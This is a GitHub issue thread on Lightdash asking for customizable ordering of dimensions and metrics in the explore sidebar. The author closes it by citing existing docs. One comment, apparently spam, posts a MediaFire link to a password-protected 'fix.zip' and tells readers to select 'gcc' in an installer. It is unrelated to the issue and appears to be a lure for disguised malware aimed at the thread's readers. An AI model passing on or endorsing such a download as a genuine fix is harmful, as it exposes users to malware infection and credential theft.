### ISSUE TITLE
Ability to customize sort order for Dimensions and Metrics in explore sidebar

### ISSUE THREAD

**Issue by jpetey75** [lightdash/lightdash#11290]
### Description

An option for ordering dimensions and metrics in the table explore sidebar. For example, I want to show the most important dimensions at the top (e.g. created_at and user_type should be above user_age), or I want to show dimensions based on a timeline order (e.g. date lost should be lower than date qualified).

### What problem does this solve?

More flexibility to customize the table explore for non-technical users to use.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jpetey75** [comment]
already exists https://docs.lightdash.com/references/tables#order-fields-by - will reopen if customer wants a more specific sorting option
